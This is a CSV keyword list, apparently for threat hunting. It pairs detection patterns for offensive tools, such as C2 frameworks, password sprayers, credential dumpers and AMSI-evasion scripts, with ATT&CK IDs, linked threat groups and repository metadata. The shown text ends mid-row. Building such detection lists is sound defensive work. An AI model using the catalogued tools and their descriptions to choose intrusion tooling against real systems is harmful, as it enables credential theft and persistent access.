"*/OffensiveCpp.git*",".{0,1000}\/OffensiveCpp\.git.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","9356"
"*/OffensiveCSharp.git*",".{0,1000}\/OffensiveCSharp\.git.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","9357"
"*/OffensiveCSharp/*",".{0,1000}\/OffensiveCSharp\/.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","9358"
"*/OffensiveLua.git*",".{0,1000}\/OffensiveLua\.git.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","9359"
"*/Offensive-Netsh-Helper.git*",".{0,1000}\/Offensive\-Netsh\-Helper\.git.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","9360"
"*/OffensiveNotion.git",".{0,1000}\/OffensiveNotion\.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9361"
"*/OffensiveNotion/agent*",".{0,1000}\/OffensiveNotion\/agent.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9362"
"*/OffensiveNotion/osxcross/target/bin*",".{0,1000}\/OffensiveNotion\/osxcross\/target\/bin.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9363"
"*/OffensiveNotion/utils*",".{0,1000}\/OffensiveNotion\/utils.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","#linux","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9364"
"*/office2john.py*",".{0,1000}\/office2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9365"
"*/OfficeInjector.exe*",".{0,1000}\/OfficeInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","1","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","9366"
"*/Office-Persistence.git*",".{0,1000}\/Office\-Persistence\.git.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","9367"
"*/OfficePersistence.ps1*",".{0,1000}\/OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","9368"
"*/Office-Persistence/master/calc.ppa*",".{0,1000}\/Office\-Persistence\/master\/calc\.ppa.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","9369"
"*/OG-Sadpanda/*",".{0,1000}\/OG\-Sadpanda\/.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z","9371"
"*/Oh365UserFinder*",".{0,1000}\/Oh365UserFinder.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","9372"
"*/oh365userfinder.py*",".{0,1000}\/oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","9373"
"*/OJ/gobuster*",".{0,1000}\/OJ\/gobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","9374"
"*/omg-payloads.git*",".{0,1000}\/omg\-payloads\.git.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","9375"
"*/Omnispray.git*",".{0,1000}\/Omnispray\.git.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9376"
"*/omnispray.py*",".{0,1000}\/omnispray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9377"
"*/omp2-brute.nse*",".{0,1000}\/omp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9378"
"*/omp2-enum-targets.nse*",".{0,1000}\/omp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9379"
"*/omron-info.nse*",".{0,1000}\/omron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9380"
"*/On_Demand_C2/*",".{0,1000}\/On_Demand_C2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","9381"
"*/onedrive_user_enum*",".{0,1000}\/onedrive_user_enum.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","9382"
"*/oneliner.tpl*",".{0,1000}\/oneliner\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9383"
"*/oneliner2.tpl*",".{0,1000}\/oneliner2\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9384"
"*/onesixtyone/dict.txt*",".{0,1000}\/onesixtyone\/dict\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","9385"
"*/onex.git*",".{0,1000}\/onex\.git.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1105 - T1078 - T1059 - T1087","TA0007 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9386"
"*/onionpipe.git*",".{0,1000}\/onionpipe\.git.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","9387"
"*/onionpipe/releases/latest*",".{0,1000}\/onionpipe\/releases\/latest.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","9388"
"*/onionpipe:main*",".{0,1000}\/onionpipe\:main.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","9389"
"*/open_vas.rb*",".{0,1000}\/open_vas\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9390"
"*/openbullet.git*",".{0,1000}\/openbullet\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","9391"
"*/OpenBullet2.git*",".{0,1000}\/OpenBullet2\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","9392"
"*/openflow-info.nse*",".{0,1000}\/openflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9393"
"*/openlookup-info.nse*",".{0,1000}\/openlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9394"
"*/openvas-otp-brute.nse*",".{0,1000}\/openvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9395"
"*/openwebnet-discovery.nse*",".{0,1000}\/openwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9397"
"*/operapassview.zip",".{0,1000}\/operapassview\.zip","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9398"
"*/opt/.exegol_aliases*",".{0,1000}\/opt\/\.exegol_aliases.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9399"
"*/opt/chimera*",".{0,1000}\/opt\/chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","9400"
"*/opt/cobaltstrike/*",".{0,1000}\/opt\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#linux","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","9401"
"*/opt/cobaltstrike/logs*",".{0,1000}\/opt\/cobaltstrike\/logs.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","#linux","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","9402"
"*/opt/cobaltstrike-nemesis*",".{0,1000}\/opt\/cobaltstrike\-nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9403"
"*/opt/Covenant/Covenant/*",".{0,1000}\/opt\/Covenant\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","#linux","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","9405"
"*/opt/dnscrypt-proxy*",".{0,1000}\/opt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","9407"
"*/opt/gocrack/files/engine*",".{0,1000}\/opt\/gocrack\/files\/engine.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","9410"
"*/opt/gocrack/files/task*",".{0,1000}\/opt\/gocrack\/files\/task.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","9411"
"*/opt/gspy_log.txt*",".{0,1000}\/opt\/gspy_log\.txt.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#linux #logfile","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","9412"
"*/opt/HttpRedirector/conf/periscope.key*",".{0,1000}\/opt\/HttpRedirector\/conf\/periscope\.key.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","9413"
"*/opt/icebreaker*",".{0,1000}\/opt\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","9414"
"*/opt/implant/*",".{0,1000}\/opt\/implant\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 